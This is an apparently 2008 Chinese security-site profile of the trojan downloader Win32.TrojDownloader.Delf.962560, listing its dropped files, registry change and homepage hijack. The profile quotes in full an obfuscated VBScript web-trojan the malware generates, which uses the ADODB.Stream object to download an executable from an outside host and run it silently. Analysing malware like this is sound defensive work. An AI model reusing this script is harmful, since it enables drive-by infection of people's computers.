科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网安全频道Win32.TrojDownloader.Delf.962560 手动专杀及 病毒资料

Win32.TrojDownloader.Delf.962560 手动专杀及 病毒资料

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

病毒名称(中文): 豆豆网马962560 病毒别名: 威胁级别: ★★☆☆☆ 病毒类型: 木马下载器 病毒长度: 962560 影响系统: Win9x WinMe WinNT Win2000 WinXP Win2003 病毒行为:

来源:论坛整理 2008年9月22日

关键字: 安全防范 病毒查杀 病毒资料

  • 评论
  • 分享微博
  • 分享邮件
病毒名称(中文): 豆豆网马962560 病毒别名: 威胁级别: ★★☆☆☆ 病毒类型: 木马下载器 病毒长度: 962560 影响系统: Win9x WinMe WinNT Win2000 WinXP Win2003
病毒行为:

这是一个木马下载者程序。该病毒成功运行起来后,就会从指定的地址下载其它病毒并运行。同时,这个病毒带有一个木马生成器,会在用户系统中生成大量能利用网页传播的脚本病毒。

1.程序运行后,下载文件几百个,有txt,jpg,js等各种病毒文件
C:\Documents and Settings\fish\Cookies\fish@32881[2].txt
C:\Documents and Settings\fish\Cookies\fish@p4p.cnaz[1].txt
C:\Documents and Settings\fish\Cookies\fish@site_pv[1].txt
C:\Documents and Settings\fish\Cookies\fish@www.32881[1].txt
C:\Documents and Settings\fish\Cookies\fish@yahoo[2].txt
.
.
.
C:\Documents and Settings\fish\Local Settings\Temporary Internet Files\Content.IE5\2PF3QNZE\72x72_2[1].gif
C:\Documents and Settings\fish\Local Settings\Temporary Internet Files\Content.IE5\2PF3QNZE\72x72_7[1].gif
C:\Documents and Settings\fish\Local Settings\Temporary Internet Files\Content.IE5\2PF3QNZE\7_0_0[1].htm
C:\Documents and Settings\fish\Local Settings\Temporary Internet Files\Content.IE5\2PF3QNZE\big[1].jpg
C:\Documents and Settings\fish\Local Settings\Temporary Internet Files\Content.IE5\2PF3QNZE\bor1_bg[1].jpg
C:\Documents and Settings\fish\Local Settings\Temporary Internet Files\Content.IE5\2PF3QNZE\img200803251448520[1].jpg
.
.
.
C:\Documents and Settings\fish\Local Settings\Temporary Internet Files\Content.IE5\TIH5F1C8\ystat[1].js

2.添加注册表项,实现开机自启动:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.htm

3.病毒运行后,运行豆豆网马生成器,其中网马地址可改动。生成网马文件内容类似:

on error resume next
dl = "http://hack.32881.com/muma.exe" //其中这个网马的网址可以修改
Set df = document.createElement("ob"&"ject")
df.setAttribute "classid", "clsid:BD96C55"&"6-65A3-11D0-983A-00C04FC29E36"
str="Microsoft"&".XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"&"ea"
str1=a1&a2&a3
str5=str1
set S = df.createobject(str5&"m","")
S.type = 1
str6="G"&"ET"
x.Open str6, dl, False
x.Send
fname1="g0ld"&".com"
set F = df.createobject("Scripti"&"ng.FilesystemObject","")
set tmp = F.GetSpecialFolder(2)
S.open
fname1= F.BuildPath(tmp,fname1)
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Ap"&"plication","")
Q.ShellExecute fname1,"","","ope"&"n",0

4.病毒会修改IE主页内容为http://www.32881.com/,并设为默认首页

    • 评论
    • 分享微博
    • 分享邮件
    VIP专区
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章

    业界热点:

    北京第二十六维信息技术有限公司(至顶网)版权所有. 京ICP备15039648号-7 京ICP证161336号 京公网安备 11010802021500号